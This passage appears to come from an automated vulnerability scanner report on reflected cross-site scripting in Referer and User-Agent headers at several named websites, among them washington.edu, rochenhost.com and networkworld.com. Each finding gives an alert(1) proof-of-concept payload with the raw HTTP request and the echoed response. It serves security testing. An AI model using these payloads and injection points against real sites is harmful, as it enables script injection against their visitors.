The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfa9'-alert(1)-'6265dee2a99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2cfa9'-alert(1)-'6265dee2a99

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:06:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:06:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932017635485; path=/; expires=Thu, 24-Jan-13 05:06:57 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=9sndsq0nnmeftdu3l1rno5rnr1; expires=Thu, 17-Feb-2011 08:40:17 GMT; path=/; domain=.networkworld.com
Content-Length: 95357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
ubtopicname: '(none)',
           pgtype: '(none)',
           subtopic: '(none)',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&q=2cfa9'-alert(1)-'6265dee2a99',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-glue',
doc_uri: '/community/index.php',
site: 'subnet_opensource',

...[SNIP]...

4.1969. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f0d"><script>alert(1)</script>92646acf2c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /unix/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=65f0d"><script>alert(1)</script>92646acf2c3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2768

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.google.com/search?hl=en&q=65f0d"><script>alert(1)</script>92646acf2c3">
...[SNIP]...

4.1970. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload bd27a<script>alert(1)</script>df1ac160f8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2764

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>df1ac160f8e"><http://www.google.com/search?hl=en&q=bd27a<script>alert(1)</script>df1ac160f8e></A>
...[SNIP]...

4.1971. http://www.rochenhost.com/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c1fb5--><script>alert(1)</script>c5cfd3457d7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c1fb5--><script>alert(1)</script>c5cfd3457d7
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=2d929a81ff6dd6043acb9a8a066a94f8; path=/
Last-Modified: Tue, 25 Jan 2011 00:09:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43543

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<script>alert(1)</script>c5cfd3457d7 -->
...[SNIP]...

4.1972. http://www.rochenhost.com/joomla-hosting [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/joomla-hosting

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload d56e4--><script>alert(1)</script>24eb3536c59 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d56e4--><script>alert(1)</script>24eb3536c59
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=c61bb9f3b7102c8aba2e3fc31a0f88e8; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:31 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43179

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<script>alert(1)</script>24eb3536c59 -->
...[SNIP]...

4.1973. http://www.traderpub.com/x22 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.traderpub.com
Path:	/x22

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ace"><script>alert(1)</script>39ae012e14a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /x22 HTTP/1.1
Host: www.traderpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=55ace"><script>alert(1)</script>39ae012e14a

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/4.0
Date: Mon, 24 Jan 2011 15:15:24 GMT
Content-type: text/html
Content-length: 363
Connection: close

<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...
<A HREF="http://www.google.com/search?hl=en&q=55ace"><script>alert(1)</script>39ae012e14a">
...[SNIP]...

4.1974. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload 9879d><script>alert(1)</script>aaede211a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 9879d><script>alert(1)</script>aaede211a9

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1148
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<img, referer: 9879d><script>alert(1)</script>aaede211a9.</br>
...[SNIP]...

4.1975. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 20e7e<script>alert(1)</script>086eb857f86 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1296
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
</script>086eb857f86">http://www.google.com/search?hl=en&q=20e7e<script>alert(1)</script>086eb857f86</a>
...[SNIP]...

4.1976. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3f4c3><script>alert(1)</script>e8ade6fb151 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1300
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<img, referer: http://www.google.com/search?hl=en&q=3f4c3><script>alert(1)</script>e8ade6fb151.</br>
...[SNIP]...

4.1977. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f90"><script>alert(1)</script>9d0ccdde51c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1304
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>You reached this URL
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=33f90"><script>alert(1)</script>9d0ccdde51c">
...[SNIP]...

4.1978. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload ead44<script>alert(1)</script>659da71b328 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ead44<script>alert(1)</script>659da71b328
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1069
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img</b> was not found or is no longer on this server.
<p>Please check the URL
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ead44<script>alert(1)</script>659da71b328<br>
...[SNIP]...

4.1979. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload d4e07><script>alert(1)</script>db7d3dc30c8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: d4e07><script>alert(1)</script>db7d3dc30c8

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1299
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<img src=a onerror=alert(String.fromCharCode(88,83,83, referer: d4e07><script>alert(1)</script>db7d3dc30c8.</br>
...[SNIP]...

4.1980. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e304"><script>alert(1)</script>3bc164e7716 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e304"><script>alert(1)</script>3bc164e7716">
...[SNIP]...

4.1981. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1772b<script>alert(1)</script>825d0cb184a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1443
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
</script>825d0cb184a">http://www.google.com/search?hl=en&q=1772b<script>alert(1)</script>825d0cb184a</a>
...[SNIP]...

4.1982. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 72eb0><script>alert(1)</script>f372d244a89 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<img src=a onerror=alert(String.fromCharCode(88,83,83, referer: http://www.google.com/search?hl=en&q=72eb0><script>alert(1)</script>f372d244a89.</br>
...[SNIP]...

4.1983. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a9cd4<script>alert(1)</script>cf2ce7c8cab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a9cd4<script>alert(1)</script>cf2ce7c8cab
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a9cd4<script>alert(1)</script>cf2ce7c8cab<br>
...[SNIP]...

4.1984. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ef0"><script>alert(1)</script>43e8426f66e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29ef0"><script>alert(1)</script>43e8426f66e

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1501
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/</b> wa
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=29ef0"><script>alert(1)</script>43e8426f66e">
...[SNIP]...

4.1985. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

